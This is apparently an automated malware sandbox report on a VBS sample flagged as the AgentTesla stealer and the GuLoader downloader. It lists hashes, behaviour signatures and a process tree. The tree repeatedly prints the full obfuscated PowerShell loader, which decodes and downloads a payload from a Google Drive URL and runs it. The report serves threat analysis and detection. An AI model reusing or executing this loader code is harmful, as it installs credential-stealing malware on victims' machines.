Overview

overview

10

Static

static

1

4ac0cae97c...c5.vbs

windows7-x64

10

4ac0cae97c...c5.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    140s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-09-2024 01:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    4ac0cae97c31320f59c86ff1a49916abe51417f3e71efbb2794a619285d5c2c5.vbs

  • Size

    19KB

  • MD5

    0f800567f6a43b8ffd8e798bc9f6d0ef

  • SHA1

    cafb5d7641be2a7b09df950ca18d4fcdce3d86c9

  • SHA256

    4ac0cae97c31320f59c86ff1a49916abe51417f3e71efbb2794a619285d5c2c5

  • SHA512

    84ce5da3d8b4effd3ee79c483919396f2cb4084da39ca4e8f868bfcf71af7b243693bb7ee9c0b208bf9737ce5b82f3b2d613fdb29737b2bf0007319898267964

  • SSDEEP

    384:QQ3GOmBsxCn6EPbz4KGsucW3k82RhyUKYHTKGPQ5PEf8szkM8vtbn2DlXQBb:t39cs86EPbjSmlTKGQPu8ckjF2Rab

Score
10/10
agentteslaguloaderdiscoverydownloaderexecutionkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4ac0cae97c31320f59c86ff1a49916abe51417f3e71efbb2794a619285d5c2c5.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:900
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Birdmouthed Enciclopedia Cultirostres #>;$blaasyren='Optagelsesprven';<#Ammestuehistorierne Spried Ebullition Malous Multitarian Natskygge #>;$Quininise=$host.PrivateData;If ($Quininise) {$skaaneprogrammers++;}function Nonaristocratically($Duryl){$Sportsmanship217=$Duryl.Length-$skaaneprogrammers;for( $Insnarers=4;$Insnarers -lt $Sportsmanship217;$Insnarers+=5){$Consolatrix+=$Duryl[$Insnarers];}$Consolatrix;}function firsaariges($Ekspeditionssystemet){ & ($Shortness) ($Ekspeditionssystemet);}$eftertaklede=Nonaristocratically 'Sei,MPleaoPro,zbottiindul onelReciaEkst/Prim5Bjer. Lin0Hydr Stud(Ob iWFunki S,unId.odForeo arwWawisin e CaruNForhTFlyg Fris1 uri0Magn.Linj0Trfi; Sin PoliW Duvi PolnDdss6Sjnx4Sbed; A c BrocxAhnf6Anti4Kale; D,s ChamrSvmmv Cro:Defe1bro 2Pati1brk .Efte0k nt) .lu niveGBombeMa.ec psakPel,oGi s/ov.r2Dele0Krte1Sowf0 Res0 Hos1S ar0Sam 1La n Rin Fopsei,ostr PaneUncofEg,noHardxHava/ cha1traw2Oddv1 ema. Und0O ko ';$Aspidiaria=Nonaristocratically 'Sorgu AnsS SetEInsuR Pre-Ufora ForGFolkEDesiNb.jot ool ';$Fysiologer141=Nonaristocratically 'frithP sttOblitSpaap Kb.sStud:Baro/ Opl/An kd.epmrPreei TaxvBryge Lej.Sk lgP,ncoDireoSkibgDa alBortespif.Reprc AsyoFo km Uns/F lmuAnticHomo?UncreBeb.xSmi pT raoAutorHypetLila=DispdMusio ThlwHusgnR.celBrneoW ntaAfstdAfba& ndeiSupedKomp=Tato1AnabRfor FAn ivTuttkfa tqDaktbAd okB dsTAfteTGaskEA frl ittXMicrOB ohw pilrMediDZaba0Ren,EP ivb oriKase8Un uG BraO SubUPrimaSomaCSlutGguatWGyrooSomnGta shTsetL De ';$Panax=Nonaristocratically ' .er>Bort ';$Shortness=Nonaristocratically 'DrnnIState nsaxVild ';$Bewpers='Overnormality163';$overdrawing = Nonaristocratically 'Fur.eBuilc rehMu,io Sel Pral%HektaNonapDingpDenddUnliaAflyt OveaD xi%Octa\UnenBPerioBo.kk ndeoCala.Su nDJenmu Humc It Faci& ar& Pha OveestancVatihGlasoAl,a BriatS.is ';firsaariges (Nonaristocratically 'Bro $Undig Saml Wono VejbScria Resl nti: B.uP Fa ic,ullU jeoTet,tNyans Appy SkasUn.et Fo eTal mVridePostrforvsSlop=Afgi(StalcHushmcentdIrre T al/AerocServ Krep$ PomoSandv roeSlr.rWaxydDikerb dyaLin wViatiDansn PengSmil)over ');firsaariges (Nonaristocratically 'Luge$sinog Aa lPerfo reabGardaBactlReca:Ens Fpar,oModerKn vrSvine nentcoelnKonki ran Anng PrasFibrgNoniaMedun .ilg,ande Gennmilj=Sekt$VlveFAbbay arksTes.iTilfo SoulPilgoR,gigDe.oeSubmr,ene1Side4Soli1Kryo. F.os vulp DeclPreci rstGle (Irre$RediPtilva Po n Te aNewtxKo s)Menn ');firsaariges (Nonaristocratically ' Sca[MorbN.ngle SmatGrow.ResoS Sy eSkjarMascvRedaiStilc tykeLsreP DeloNonpiModsn JodtMyliMLampaOpfanApsia betgReepe OmhrOpfo]Arv : Ic,:DesiSI iteTid cSkiluBaftr hvii Re t S kyAlbuPNo pr PiroPi dtLaunoFirec De.oMat lAcce Uni=Pl i Rhod[Sp,nN arteDismtAfsk.PeriSbelgeneoncEma uUnexrN rriIndotAktuyUnhyPMal rSubooDatotC.rroRingcBungoLabilEnsiTOve yBaggpfljte Per]Komm:kerf:Inu,TBorolgastsO er1Cari2Te p ');$Fysiologer141=$Forretningsgangen[0];$Microcomputers= (Nonaristocratically ' Pal$ForggTearLRappOAspab yopATalllLavs:No.nJBracEPapia Mo N WitNGinkASkam7Urti1Kurs=sty NToldeNutrWChai-M ndOLoatbSpavJpreceTon cCopatVen ends FruYPre stowntCy,leaabnMTher.IndgNnymaerorst,nel.ForuwD spES brB.usoCpa alBev,iM.saEOrphN U dT');$Microcomputers+=$Pilotsystemers[1];firsaariges ($Microcomputers);firsaariges (Nonaristocratically 'Laza$textJStraeLigeaGoatnSternRet aB un7Cyke1Tart. SouH RameSnowaA,sadUgene PhrrA ris Fer[Inte$IchtA nonsS,alpKateiRespd U si PikaKo srLipsi u,faF,rl] Agn=Iris$Sha.eStorfVerdtBrave DanrUns tHon a.uftk url laeConsdvyaseSubm ');$Ophugning=Nonaristocratically 'Unde$ .riJ Vrde Stra ,non Oprn hilarin 7 Co 1.idt.MoonDunboo.aprwSandnAndelNavloNiveaPrivd raFsauciTrill Omre inu( Fli$ GasFFilmyRygtsB buiducho TurlSuffoSlupg,olie F rrHjla1,amm4Ggl 1Omst, Unf$ TeeSUnfauIntelCistp Fe hdat oFysibBr.deBrusnFotozadkooBio.a Bagt Teae Fem1Acry5Bold7 No ) raa ';$Sulphobenzoate157=$Pilotsystemers[0];firsaariges (Nonaristocratically 'Chup$ Vi,gFrarLskruO R.aBEde ASpttlScr.: ymR ForeAdeslIndeaH ndKAdhrsHemaaUndeTBe sI pneoF.brnbulkE s,rr riSUsig=Ch m( In TLsthE AlmSThrutMetr-F.asP skrA LymtBarrhCros Floa$Enhos tunU,avnlL xipDezihBorgorevoB ZooE TyvnOverzBogaoMartAs azT onveSkab1 Dde5 om7 Dol)Samp ');while (!$Relaksationers) {firsaariges (Nonaristocratically ' tat$ CutgChoulfremo houb rteaSomnl Sek:Fu hUAgusnRek,lF,naoSpiro olisGlyce ResnF essSyre=Co n$NasutNewpr ndku jereddss ') ;firsaariges $Ophugning;firsaariges (Nonaristocratically '.rotSLaget usta adarF rstNeu -Act SBeamlTaraeGange aupGryd Dei4Libe ');firsaariges (Nonaristocratically 'e os$ evegForelPolyoL,ncbEmita Spil tuk:InexRSteveMrenl VitaFi ikS ccsreviaBrant isaiValgoImpunSucceChinr Br s Pl,=Sk r(NuanTansteSobesAa,rtSlov-Sk lP lapaFreatYahahVold Fre$M taSUdbluC nslDambpIc,nh ticomu rb Keke.yern Wi.zm djoAmela rebtTi reFict1Spr,5Sjof7Vdd,)Toas ') ;firsaariges (Nonaristocratically 'Fods$ UdsgPsyclKonsoN.pobBl vaUnail tj:BlndMBetve nddAut vBortiCloon.evad Ka eSis.nUdk.eSi msetap=Prot$culggF skl Ac oE,mebWearaKamel Sp :NulpTNumea FibsUdletPloutFlokrmi.ry KrnkResi+Salg+Indl%Vild$Uv,dF lao o frS.ror Same Spst FstnForui ,uanAmmug TytsSoprg,chia mfonBarygperieRettnObve.rystcSavaolegiu GognErhvtForm ') ;$Fysiologer141=$Forretningsgangen[$Medvindenes];}$Maaneformrkelserne=309487;$Flugtskydningens=27293;firsaariges (Nonaristocratically ' ,un$Var gGeodlKlamo,capbingeaRentlSter:HereSOakukKommo,alalV,lfdb.rtk Famomatup ,nipNegle .orrdebonBalkeByggs nv F.te=Bi a ardG utne.efutBouc-SothC Ekso Oven Fe tStrae CadnNonotImmi heli$TrueSRa suspecl ReipGra,hLukko.ullbCa aeFragnEndazMesao ,apa .ewtol fePhil1Co m5hjde7Elec ');firsaariges (Nonaristocratically 'nat $Festg rotlV rioBogwb FlaaClumlArbe:WabbSPluseAltrcMicrtRiveiParal,ambeSl p Rand= Vi Acco[,berSRadiy s isSisktBroge UnpmFlyv. OveCAfdroKollnDeglv OveeTautrPlagtDemo]Fore: For:KompF BoxrS anoHarrm OplBNonraCrissMeteeAmts6Inde4 GokSNomatSkovr Alli B,nn undgTota(Unic$M siS,eunkkom oapprlSubddU rakBo doRe lpWi wpOvereOpkrrLighnVarneHalvsSeac)Op e ');firsaariges (Nonaristocratically ' Che$Fa igl eblF ruoK erb sh aUnwalSves:CaluYOdysa G.ag WreuQue,aByggsUd.i Infl=O,dr Kamp[ G nSe teyDomesOdobt s neTe emK um.Hel TTecae Va.x ogatAddu.BracEPrognVrngcBam oBrowdHexaiOtacnM neg Pol]Laps:crys: arAForrSBe kC Of I Me.IKuve.Ne,kGArmheTrestVoksSOmsttfagfr osiByrdnKomigPlio( Ill$TranSUndeembelcD,sktEntriPerol P de,upe)supe ');firsaariges (Nonaristocratically 'Stvl$j legkefflForeo PorbKalkaIn,olPas :TumuUDilin Appd PiveA.alr Br vindvgMeletFrigeLe,ttMonosSens=Re o$Sup Y KonaExplgForfuForwaL xns ure.Damps ph u nkebTohasAfspt ClarPalmiSignn K,tg S i(Visi$FamiMbyriaHackaReklnB dseTilkf Talo .ntrSkelmSitir iktkUdraeUnsilNed.sFliceIns rErgunPeyoeVa i,Phyl$A atF Th,lAmm uStamgLyketSandsOgdokUndayDis dVelsnLan.i ,genOverg sube.rrenLslas Fr ) cab ');firsaariges $Undervgtets;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:404
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Boko.Duc && echo t"
        3⤵
          PID:3952
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Birdmouthed Enciclopedia Cultirostres #>;$blaasyren='Optagelsesprven';<#Ammestuehistorierne Spried Ebullition Malous Multitarian Natskygge #>;$Quininise=$host.PrivateData;If ($Quininise) {$skaaneprogrammers++;}function Nonaristocratically($Duryl){$Sportsmanship217=$Duryl.Length-$skaaneprogrammers;for( $Insnarers=4;$Insnarers -lt $Sportsmanship217;$Insnarers+=5){$Consolatrix+=$Duryl[$Insnarers];}$Consolatrix;}function firsaariges($Ekspeditionssystemet){ & ($Shortness) ($Ekspeditionssystemet);}$eftertaklede=Nonaristocratically 'Sei,MPleaoPro,zbottiindul onelReciaEkst/Prim5Bjer. Lin0Hydr Stud(Ob iWFunki S,unId.odForeo arwWawisin e CaruNForhTFlyg Fris1 uri0Magn.Linj0Trfi; Sin PoliW Duvi PolnDdss6Sjnx4Sbed; A c BrocxAhnf6Anti4Kale; D,s ChamrSvmmv Cro:Defe1bro 2Pati1brk .Efte0k nt) .lu niveGBombeMa.ec psakPel,oGi s/ov.r2Dele0Krte1Sowf0 Res0 Hos1S ar0Sam 1La n Rin Fopsei,ostr PaneUncofEg,noHardxHava/ cha1traw2Oddv1 ema. Und0O ko ';$Aspidiaria=Nonaristocratically 'Sorgu AnsS SetEInsuR Pre-Ufora ForGFolkEDesiNb.jot ool ';$Fysiologer141=Nonaristocratically 'frithP sttOblitSpaap Kb.sStud:Baro/ Opl/An kd.epmrPreei TaxvBryge Lej.Sk lgP,ncoDireoSkibgDa alBortespif.Reprc AsyoFo km Uns/F lmuAnticHomo?UncreBeb.xSmi pT raoAutorHypetLila=DispdMusio ThlwHusgnR.celBrneoW ntaAfstdAfba& ndeiSupedKomp=Tato1AnabRfor FAn ivTuttkfa tqDaktbAd okB dsTAfteTGaskEA frl ittXMicrOB ohw pilrMediDZaba0Ren,EP ivb oriKase8Un uG BraO SubUPrimaSomaCSlutGguatWGyrooSomnGta shTsetL De ';$Panax=Nonaristocratically ' .er>Bort ';$Shortness=Nonaristocratically 'DrnnIState nsaxVild ';$Bewpers='Overnormality163';$overdrawing = Nonaristocratically 'Fur.eBuilc rehMu,io Sel Pral%HektaNonapDingpDenddUnliaAflyt OveaD xi%Octa\UnenBPerioBo.kk ndeoCala.Su nDJenmu Humc It Faci& ar& Pha OveestancVatihGlasoAl,a BriatS.is ';firsaariges (Nonaristocratically 'Bro $Undig Saml Wono VejbScria Resl nti: B.uP Fa ic,ullU jeoTet,tNyans Appy SkasUn.et Fo eTal mVridePostrforvsSlop=Afgi(StalcHushmcentdIrre T al/AerocServ Krep$ PomoSandv roeSlr.rWaxydDikerb dyaLin wViatiDansn PengSmil)over ');firsaariges (Nonaristocratically 'Luge$sinog Aa lPerfo reabGardaBactlReca:Ens Fpar,oModerKn vrSvine nentcoelnKonki ran Anng PrasFibrgNoniaMedun .ilg,ande Gennmilj=Sekt$VlveFAbbay arksTes.iTilfo SoulPilgoR,gigDe.oeSubmr,ene1Side4Soli1Kryo. F.os vulp DeclPreci rstGle (Irre$RediPtilva Po n Te aNewtxKo s)Menn ');firsaariges (Nonaristocratically ' Sca[MorbN.ngle SmatGrow.ResoS Sy eSkjarMascvRedaiStilc tykeLsreP DeloNonpiModsn JodtMyliMLampaOpfanApsia betgReepe OmhrOpfo]Arv : Ic,:DesiSI iteTid cSkiluBaftr hvii Re t S kyAlbuPNo pr PiroPi dtLaunoFirec De.oMat lAcce Uni=Pl i Rhod[Sp,nN arteDismtAfsk.PeriSbelgeneoncEma uUnexrN rriIndotAktuyUnhyPMal rSubooDatotC.rroRingcBungoLabilEnsiTOve yBaggpfljte Per]Komm:kerf:Inu,TBorolgastsO er1Cari2Te p ');$Fysiologer141=$Forretningsgangen[0];$Microcomputers= (Nonaristocratically ' Pal$ForggTearLRappOAspab yopATalllLavs:No.nJBracEPapia Mo N WitNGinkASkam7Urti1Kurs=sty NToldeNutrWChai-M ndOLoatbSpavJpreceTon cCopatVen ends FruYPre stowntCy,leaabnMTher.IndgNnymaerorst,nel.ForuwD spES brB.usoCpa alBev,iM.saEOrphN U dT');$Microcomputers+=$Pilotsystemers[1];firsaariges ($Microcomputers);firsaariges (Nonaristocratically 'Laza$textJStraeLigeaGoatnSternRet aB un7Cyke1Tart. SouH RameSnowaA,sadUgene PhrrA ris Fer[Inte$IchtA nonsS,alpKateiRespd U si PikaKo srLipsi u,faF,rl] Agn=Iris$Sha.eStorfVerdtBrave DanrUns tHon a.uftk url laeConsdvyaseSubm ');$Ophugning=Nonaristocratically 'Unde$ .riJ Vrde Stra ,non Oprn hilarin 7 Co 1.idt.MoonDunboo.aprwSandnAndelNavloNiveaPrivd raFsauciTrill Omre inu( Fli$ GasFFilmyRygtsB buiducho TurlSuffoSlupg,olie F rrHjla1,amm4Ggl 1Omst, Unf$ TeeSUnfauIntelCistp Fe hdat oFysibBr.deBrusnFotozadkooBio.a Bagt Teae Fem1Acry5Bold7 No ) raa ';$Sulphobenzoate157=$Pilotsystemers[0];firsaariges (Nonaristocratically 'Chup$ Vi,gFrarLskruO R.aBEde ASpttlScr.: ymR ForeAdeslIndeaH ndKAdhrsHemaaUndeTBe sI pneoF.brnbulkE s,rr riSUsig=Ch m( In TLsthE AlmSThrutMetr-F.asP skrA LymtBarrhCros Floa$Enhos tunU,avnlL xipDezihBorgorevoB ZooE TyvnOverzBogaoMartAs azT onveSkab1 Dde5 om7 Dol)Samp ');while (!$Relaksationers) {firsaariges (Nonaristocratically ' tat$ CutgChoulfremo houb rteaSomnl Sek:Fu hUAgusnRek,lF,naoSpiro olisGlyce ResnF essSyre=Co n$NasutNewpr ndku jereddss ') ;firsaariges $Ophugning;firsaariges (Nonaristocratically '.rotSLaget usta adarF rstNeu -Act SBeamlTaraeGange aupGryd Dei4Libe ');firsaariges (Nonaristocratically 'e os$ evegForelPolyoL,ncbEmita Spil tuk:InexRSteveMrenl VitaFi ikS ccsreviaBrant isaiValgoImpunSucceChinr Br s Pl,=Sk r(NuanTansteSobesAa,rtSlov-Sk lP lapaFreatYahahVold Fre$M taSUdbluC nslDambpIc,nh ticomu rb Keke.yern Wi.zm djoAmela rebtTi reFict1Spr,5Sjof7Vdd,)Toas ') ;firsaariges (Nonaristocratically 'Fods$ UdsgPsyclKonsoN.pobBl vaUnail tj:BlndMBetve nddAut vBortiCloon.evad Ka eSis.nUdk.eSi msetap=Prot$culggF skl Ac oE,mebWearaKamel Sp :NulpTNumea FibsUdletPloutFlokrmi.ry KrnkResi+Salg+Indl%Vild$Uv,dF lao o frS.ror Same Spst FstnForui ,uanAmmug TytsSoprg,chia mfonBarygperieRettnObve.rystcSavaolegiu GognErhvtForm ') ;$Fysiologer141=$Forretningsgangen[$Medvindenes];}$Maaneformrkelserne=309487;$Flugtskydningens=27293;firsaariges (Nonaristocratically ' ,un$Var gGeodlKlamo,capbingeaRentlSter:HereSOakukKommo,alalV,lfdb.rtk Famomatup ,nipNegle .orrdebonBalkeByggs nv F.te=Bi a ardG utne.efutBouc-SothC Ekso Oven Fe tStrae CadnNonotImmi heli$TrueSRa suspecl ReipGra,hLukko.ullbCa aeFragnEndazMesao ,apa .ewtol fePhil1Co m5hjde7Elec ');firsaariges (Nonaristocratically 'nat $Festg rotlV rioBogwb FlaaClumlArbe:WabbSPluseAltrcMicrtRiveiParal,ambeSl p Rand= Vi Acco[,berSRadiy s isSisktBroge UnpmFlyv. OveCAfdroKollnDeglv OveeTautrPlagtDemo]Fore: For:KompF BoxrS anoHarrm OplBNonraCrissMeteeAmts6Inde4 GokSNomatSkovr Alli B,nn undgTota(Unic$M siS,eunkkom oapprlSubddU rakBo doRe lpWi wpOvereOpkrrLighnVarneHalvsSeac)Op e ');firsaariges (Nonaristocratically ' Che$Fa igl eblF ruoK erb sh aUnwalSves:CaluYOdysa G.ag WreuQue,aByggsUd.i Infl=O,dr Kamp[ G nSe teyDomesOdobt s neTe emK um.Hel TTecae Va.x ogatAddu.BracEPrognVrngcBam oBrowdHexaiOtacnM neg Pol]Laps:crys: arAForrSBe kC Of I Me.IKuve.Ne,kGArmheTrestVoksSOmsttfagfr osiByrdnKomigPlio( Ill$TranSUndeembelcD,sktEntriPerol P de,upe)supe ');firsaariges (Nonaristocratically 'Stvl$j legkefflForeo PorbKalkaIn,olPas :TumuUDilin Appd PiveA.alr Br vindvgMeletFrigeLe,ttMonosSens=Re o$Sup Y KonaExplgForfuForwaL xns ure.Damps ph u nkebTohasAfspt ClarPalmiSignn K,tg S i(Visi$FamiMbyriaHackaReklnB dseTilkf Talo .ntrSkelmSitir iktkUdraeUnsilNed.sFliceIns rErgunPeyoeVa i,Phyl$A atF Th,lAmm uStamgLyketSandsOgdokUndayDis dVelsnLan.i ,genOverg sube.rrenLslas Fr ) cab ');firsaariges $Undervgtets;"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:312
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Birdmouthed Enciclopedia Cultirostres #>;$blaasyren='Optagelsesprven';<#Ammestuehistorierne Spried Ebullition Malous Multitarian Natskygge #>;$Quininise=$host.PrivateData;If ($Quininise) {$skaaneprogrammers++;}function Nonaristocratically($Duryl){$Sportsmanship217=$Duryl.Length-$skaaneprogrammers;for( $Insnarers=4;$Insnarers -lt $Sportsmanship217;$Insnarers+=5){$Consolatrix+=$Duryl[$Insnarers];}$Consolatrix;}function firsaariges($Ekspeditionssystemet){ & ($Shortness) ($Ekspeditionssystemet);}$eftertaklede=Nonaristocratically 'Sei,MPleaoPro,zbottiindul onelReciaEkst/Prim5Bjer. Lin0Hydr Stud(Ob iWFunki S,unId.odForeo arwWawisin e CaruNForhTFlyg Fris1 uri0Magn.Linj0Trfi; Sin PoliW Duvi PolnDdss6Sjnx4Sbed; A c BrocxAhnf6Anti4Kale; D,s ChamrSvmmv Cro:Defe1bro 2Pati1brk .Efte0k nt) .lu niveGBombeMa.ec psakPel,oGi s/ov.r2Dele0Krte1Sowf0 Res0 Hos1S ar0Sam 1La n Rin Fopsei,ostr PaneUncofEg,noHardxHava/ cha1traw2Oddv1 ema. Und0O ko ';$Aspidiaria=Nonaristocratically 'Sorgu AnsS SetEInsuR Pre-Ufora ForGFolkEDesiNb.jot ool ';$Fysiologer141=Nonaristocratically 'frithP sttOblitSpaap Kb.sStud:Baro/ Opl/An kd.epmrPreei TaxvBryge Lej.Sk lgP,ncoDireoSkibgDa alBortespif.Reprc AsyoFo km Uns/F lmuAnticHomo?UncreBeb.xSmi pT raoAutorHypetLila=DispdMusio ThlwHusgnR.celBrneoW ntaAfstdAfba& ndeiSupedKomp=Tato1AnabRfor FAn ivTuttkfa tqDaktbAd okB dsTAfteTGaskEA frl ittXMicrOB ohw pilrMediDZaba0Ren,EP ivb oriKase8Un uG BraO SubUPrimaSomaCSlutGguatWGyrooSomnGta shTsetL De ';$Panax=Nonaristocratically ' .er>Bort ';$Shortness=Nonaristocratically 'DrnnIState nsaxVild ';$Bewpers='Overnormality163';$overdrawing = Nonaristocratically 'Fur.eBuilc rehMu,io Sel Pral%HektaNonapDingpDenddUnliaAflyt OveaD xi%Octa\UnenBPerioBo.kk ndeoCala.Su nDJenmu Humc It Faci& ar& Pha OveestancVatihGlasoAl,a BriatS.is ';firsaariges (Nonaristocratically 'Bro $Undig Saml Wono VejbScria Resl nti: B.uP Fa ic,ullU jeoTet,tNyans Appy SkasUn.et Fo eTal mVridePostrforvsSlop=Afgi(StalcHushmcentdIrre T al/AerocServ Krep$ PomoSandv roeSlr.rWaxydDikerb dyaLin wViatiDansn PengSmil)over ');firsaariges (Nonaristocratically 'Luge$sinog Aa lPerfo reabGardaBactlReca:Ens Fpar,oModerKn vrSvine nentcoelnKonki ran Anng PrasFibrgNoniaMedun .ilg,ande Gennmilj=Sekt$VlveFAbbay arksTes.iTilfo SoulPilgoR,gigDe.oeSubmr,ene1Side4Soli1Kryo. F.os vulp DeclPreci rstGle (Irre$RediPtilva Po n Te aNewtxKo s)Menn ');firsaariges (Nonaristocratically ' Sca[MorbN.ngle SmatGrow.ResoS Sy eSkjarMascvRedaiStilc tykeLsreP DeloNonpiModsn JodtMyliMLampaOpfanApsia betgReepe OmhrOpfo]Arv : Ic,:DesiSI iteTid cSkiluBaftr hvii Re t S kyAlbuPNo pr PiroPi dtLaunoFirec De.oMat lAcce Uni=Pl i Rhod[Sp,nN arteDismtAfsk.PeriSbelgeneoncEma uUnexrN rriIndotAktuyUnhyPMal rSubooDatotC.rroRingcBungoLabilEnsiTOve yBaggpfljte Per]Komm:kerf:Inu,TBorolgastsO er1Cari2Te p ');$Fysiologer141=$Forretningsgangen[0];$Microcomputers= (Nonaristocratically ' Pal$ForggTearLRappOAspab yopATalllLavs:No.nJBracEPapia Mo N WitNGinkASkam7Urti1Kurs=sty NToldeNutrWChai-M ndOLoatbSpavJpreceTon cCopatVen ends FruYPre stowntCy,leaabnMTher.IndgNnymaerorst,nel.ForuwD spES brB.usoCpa alBev,iM.saEOrphN U dT');$Microcomputers+=$Pilotsystemers[1];firsaariges ($Microcomputers);firsaariges (Nonaristocratically 'Laza$textJStraeLigeaGoatnSternRet aB un7Cyke1Tart. SouH RameSnowaA,sadUgene PhrrA ris Fer[Inte$IchtA nonsS,alpKateiRespd U si PikaKo srLipsi u,faF,rl] Agn=Iris$Sha.eStorfVerdtBrave DanrUns tHon a.uftk url laeConsdvyaseSubm ');$Ophugning=Nonaristocratically 'Unde$ .riJ Vrde Stra ,non Oprn hilarin 7 Co 1.idt.MoonDunboo.aprwSandnAndelNavloNiveaPrivd raFsauciTrill Omre inu( Fli$ GasFFilmyRygtsB buiducho TurlSuffoSlupg,olie F rrHjla1,amm4Ggl 1Omst, Unf$ TeeSUnfauIntelCistp Fe hdat oFysibBr.deBrusnFotozadkooBio.a Bagt Teae Fem1Acry5Bold7 No ) raa ';$Sulphobenzoate157=$Pilotsystemers[0];firsaariges (Nonaristocratically 'Chup$ Vi,gFrarLskruO R.aBEde ASpttlScr.: ymR ForeAdeslIndeaH ndKAdhrsHemaaUndeTBe sI pneoF.brnbulkE s,rr riSUsig=Ch m( In TLsthE AlmSThrutMetr-F.asP skrA LymtBarrhCros Floa$Enhos tunU,avnlL xipDezihBorgorevoB ZooE TyvnOverzBogaoMartAs azT onveSkab1 Dde5 om7 Dol)Samp ');while (!$Relaksationers) {firsaariges (Nonaristocratically ' tat$ CutgChoulfremo houb rteaSomnl Sek:Fu hUAgusnRek,lF,naoSpiro olisGlyce ResnF essSyre=Co n$NasutNewpr ndku jereddss ') ;firsaariges $Ophugning;firsaariges (Nonaristocratically '.rotSLaget usta adarF rstNeu -Act SBeamlTaraeGange aupGryd Dei4Libe ');firsaariges (Nonaristocratically 'e os$ evegForelPolyoL,ncbEmita Spil tuk:InexRSteveMrenl VitaFi ikS ccsreviaBrant isaiValgoImpunSucceChinr Br s Pl,=Sk r(NuanTansteSobesAa,rtSlov-Sk lP lapaFreatYahahVold Fre$M taSUdbluC nslDambpIc,nh ticomu rb Keke.yern Wi.zm djoAmela rebtTi reFict1Spr,5Sjof7Vdd,)Toas ') ;firsaariges (Nonaristocratically 'Fods$ UdsgPsyclKonsoN.pobBl vaUnail tj:BlndMBetve nddAut vBortiCloon.evad Ka eSis.nUdk.eSi msetap=Prot$culggF skl Ac oE,mebWearaKamel Sp :NulpTNumea FibsUdletPloutFlokrmi.ry KrnkResi+Salg+Indl%Vild$Uv,dF lao o frS.ror Same Spst FstnForui ,uanAmmug TytsSoprg,chia mfonBarygperieRettnObve.rystcSavaolegiu GognErhvtForm ') ;$Fysiologer141=$Forretningsgangen[$Medvindenes];}$Maaneformrkelserne=309487;$Flugtskydningens=27293;firsaariges (Nonaristocratically ' ,un$Var gGeodlKlamo,capbingeaRentlSter:HereSOakukKommo,alalV,lfdb.rtk Famomatup ,nipNegle .orrdebonBalkeByggs nv F.te=Bi a ardG utne.efutBouc-SothC Ekso Oven Fe tStrae CadnNonotImmi heli$TrueSRa suspecl ReipGra,hLukko.ullbCa aeFragnEndazMesao ,apa .ewtol fePhil1Co m5hjde7Elec ');firsaariges (Nonaristocratically 'nat $Festg rotlV rioBogwb FlaaClumlArbe:WabbSPluseAltrcMicrtRiveiParal,ambeSl p Rand= Vi Acco[,berSRadiy s isSisktBroge UnpmFlyv. OveCAfdroKollnDeglv OveeTautrPlagtDemo]Fore: For:KompF BoxrS anoHarrm OplBNonraCrissMeteeAmts6Inde4 GokSNomatSkovr Alli B,nn undgTota(Unic$M siS,eunkkom oapprlSubddU rakBo doRe lpWi wpOvereOpkrrLighnVarneHalvsSeac)Op e ');firsaariges (Nonaristocratically ' Che$Fa igl eblF ruoK erb sh aUnwalSves:CaluYOdysa G.ag WreuQue,aByggsUd.i Infl=O,dr Kamp[ G nSe teyDomesOdobt s neTe emK um.Hel TTecae Va.x ogatAddu.BracEPrognVrngcBam oBrowdHexaiOtacnM neg Pol]Laps:crys: arAForrSBe kC Of I Me.IKuve.Ne,kGArmheTrestVoksSOmsttfagfr osiByrdnKomigPlio( Ill$TranSUndeembelcD,sktEntriPerol P de,upe)supe ');firsaariges (Nonaristocratically 'Stvl$j legkefflForeo PorbKalkaIn,olPas :TumuUDilin Appd PiveA.alr Br vindvgMeletFrigeLe,ttMonosSens=Re o$Sup Y KonaExplgForfuForwaL xns 